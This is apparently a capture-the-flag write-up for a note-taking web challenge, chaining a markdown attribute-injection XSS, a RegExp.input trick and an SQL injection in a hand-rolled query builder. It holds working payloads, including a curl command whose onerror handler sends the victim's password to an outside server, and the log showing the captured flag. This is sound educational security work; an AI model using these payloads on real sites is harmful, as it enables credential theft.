    // make an account
    const username = Array(32)
      .fill('')
      .map(() => Math.floor(Math.random() * 16).toString(16))
      .join('');
    const password = flag;

    const firstLogin = doLogin(username, password);

    try {
      page.goto(`https://no-cookies-${instance}.mc.ax/register`);
    } catch {}

    await firstLogin;

    await sleep(3000);

    // visit the note and log in
    const secondLogin = doLogin(username, password);

    try {
      page.goto(url);
    } catch {}

    await secondLogin;

As we can see from the bot code. It creates an account with a random username, and the password being the flag which we are trying to obtain. Since it first visits one page, and then a second of our choosing, this is a strong hint that the intended solution is some sort of XSS to exfiltrate the password.

The view code

Since I suspected that we were looking for an XSS, and I knew the app supported markdown, a good first place to look was the markdown rendering code. This happened entirely client-side on the view note page. Here is the relevant snippet, with important parts bolded.

<script>
  (() => {
    const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

    const promptValid = (text) => {
      let result = prompt(text) ?? '';
      return validate(result) ? result : promptValid(text);
    }

    const username = promptValid('Username:');
    const password = promptValid('Password:');

    const params = new URLSearchParams(window.location.search);

    (async () => {
      const { note, mode, views } = await (await fetch('/view', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          username,
          password,
          id: params.get('id')
        })
      })).json();

      if (!note) {
        alert('Invalid username, password, or note id');
        window.location = '/';
        return;
      }

      let text = note;
      if (mode === 'markdown') {
        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

        text = text.replace(/#\s*([^\n]+)/g, (match, p1) => {
          return `<h1>${p1}</h1>`;
        });
        text = text.replace(/\*\*([^\n]+)\*\*/g, (match, p1) => {
          return `<strong>${p1}</strong>`;
        });
        text = text.replace(/\*([^\n]+)\*/g, (match, p1) => {
          return `<em>${p1}</em>`;
        });
      }

      document.querySelector('.note').innerHTML = text;
      document.querySelector('.views').innerText = views;
    })();
  })();
</script>
 

The first thing I was drawn to was this part:

        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

Which looks for syntax like (Link text)[https://urltolinkto.com] and replaces it with a link. A keen eye would notice that the url is allowed to contain double quotes ("), which don't get escaped. This allows you to make extra attributes on the <a> tag. For example (link text)[http://example.com" class="foo] gets turned into <a href="http://example.com" class="foo">link text</a>. This can be used as an XSS by using html event handlers. For example, (link)[https://example.com" onmouseover="alert`1`]. Will make an alert box if you hover over the link with your mouse.

A lack of user interaction 

However, the admin bot doesn't have a mouse, and doesn't interact with the page. So how do we make the xss trigger? We can't tell it to hover over the link

This took me a little while, because I was testing on firefox, but the admin bot uses chrome, and the behaviour is mildly different. Eventually though, I found out that in chrome you can use the autofocus attribute to force focus to the element, and use an onfocus handler to execute code:

(foo)[http://example.com" autofocus=autofocus onfocus="alert`1`]

This will pop the alert box immediately on page view, including for the admin bot

Problem solved right? Wait...

With that, I had assumed I had solved the problem. All I had to do was read the password variable, and send it off to a webserver I control.

So to check if that would work, first I tried:


(foo)[http://example.com" autofocus=autofocus onfocus="alert(password&#x29;]

Note: The ) had to be escaped as &#x29; because the regex stopped at first ")"

...and got a pop-up saying "undefined". Whoops looking back at the view code, I see that const password, is defined in an anonymous arrow function, and my code is executing outside of it (Since its coming from an HTML event handler) so the password variable is not in scope.

At this point, I got stumped for a little bit.

Looking back at the code, I noticed that it was validating the password a bit weirdly

     const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

It was basically checking that the password has at least 1 character, and does not contain apostrophes or dollar signs. Which is just a bit random. If this was actually important you would do it on the server side. In a CTF, one of the key things to do is look for code that stick out or code that looks like something you wouldn't normally write if writing software. This validate function looked a bit suspicious to me, although to be honest, I only thought that because I was fairly stuck at this point.

 I had a vague memory of early JS having some weird design choices around Regexes. So I decided to read up on RegExp in Javascript. Eventually I found this page https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp/input which was very relevant to the matter at hand.

 In short, whenever you run a regex in javascript, JS saves the text you ran it on as a static class property, and you can access it later by looking at RegExp.input.

 This is first of all crazy (Thanks JS). However, it seemed perfect for this situation. I assumed that since the password was the last thing .test() was ran on, I could obtain it from RegExp.input

However, there was a problem. All the .replace() calls from the markdown parsing also set RegExp.input overriding the password. It seemed like I was at an impasse.

The app did support plaintext notes, which wouldn't run the problematic .replace() calls. If I could somehow get an XSS in a plaintext note, then I could use the RegExp.input trick

Perhaps the markdown XSS I found was a red herring, and I needed to look elsewhere.

 On to an SQL injection

Looking at the view code, if the note is a plaintext note, then it is inserted directly into the document without any escaping on the client side. All the escaping takes place on the backend at insert time. Lets take a look at the backend code:

 const db = {
  prepare: (query, params) => {
    if (params)
      for (const [key, value] of Object.entries(params)) {
        const clean = value.replace(/['$]/g, '');
        query = query.replaceAll(`:${key}`, `'${clean}'`);
      }
    return query;
  },

[...]
  run: (query, params) => {
    const prepared = db.prepare(query, params);
    console.log( prepared );
    return database.prepare(prepared).run();
  },
};

[...]

  db.run('INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)', {
    id,
    username,
    note: note.replace(/[<>]/g, ''),
    mode,
  });

 

 As you can see, at insert, the app strips < and > when inserting a note in the DB. It doesn't seem like there's any way to get an XSS past that filter.

However, the prepare function has a flaw that lets us manipulate how SQL queries are generated in general.

The prepare function replaces keys like :note with their escaped values one at a time. However, it doesn't check whether the parameter value contains a replacement identifier itself. For example, if your username is :note, the SQL query will become messed up after :note gets replaced in the replacement.

As an example, consider how the following query would be prepared:

db.run( 'INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)',
  {
    id: "12345",
    username: ":note",
    note: ', :mode, 22, 0)-- ',
    mode: '<img src=x onerror="alert(RegExp.input)">',
  }

Lets run through what would happen when preparing this query.

We start with:


INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)

We replace :id with '12345'

INSERT INTO notes VALUES ('12345', :username, :note, :mode, 0)

We replace :username with ':note'

 INSERT INTO notes VALUES ('12345', ':note', :note, :mode, 0)

We replace :note with ',:mode, 22, 0)-- '

 INSERT INTO notes VALUES ('12345', '', :mode, 22, 0)-- '', ',:mode, 22, 0)-- ', :note, :mode, 0)

We replace :mode with '<img src=x onerror="alert(RegExp.input)">'

 INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0)-- '', ',:mode, 22, 0)-- ', :note, :mode, 0)

Note that -- is the SQL comment character, so the end result is effectively:

  INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0);

 bypassing the XSS filter.

Success

In the end we have inserted a plaintext note containing malicious javascript (Any note that has a mode which is not 'markdown' is considered plaintext).  I visited the page, and I got a pop-up with my password.

Now all we need to do is make a payload that instead of showing the password in an alert box, exfiltrates the password to us.

I pre-registered an account with username ":note" and passwored "password". I then created a note with the following curl command:

$ curl 'https://no-cookies-0ac0b52c95f3abe3.mc.ax/create' -H 'Content-Type: application/json' --data-raw '{"username":":note","password":"password","note":",:mode, 22, 0)-- ","mode":"<img src=x onerror=\"window.location=&quot;https://bawolff.net?&quot;+RegExp.input\">"}'


{"id":"32e8c795bb8b44b74d52d74e261a2942"}

 
 I then input the view url to the admin bot service, waited for the admin bot to visit it and watched my webserver log. Sure enough, I soon saw:

34.139.106.105 - - [06/Feb/2022:08:52:49 +0000] "GET /?dice{curr3nt_st4t3_0f_j4v45cr1pt} HTTP/1.1" 200 5514 "https://no-cookies-0ac0b52c95f3abe3.mc.ax/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/100.0.4855.0 Safari/537.36" 

Thus the flag is dice{curr3nt_st4t3_0f_j4v45cr1pt} 

 

p.s. I hear that RegExp.input isn't the only possible solution. I definitely was not able to think of something like this, but I heard some teams used a really ingenious solution involving replacing the document.querySelector, JSON.stringify functions and re-calling the inner async anon function so that the attacker controlled replaced JSON.stringify function gets called with the password. Which is an absolutely beautiful exploit.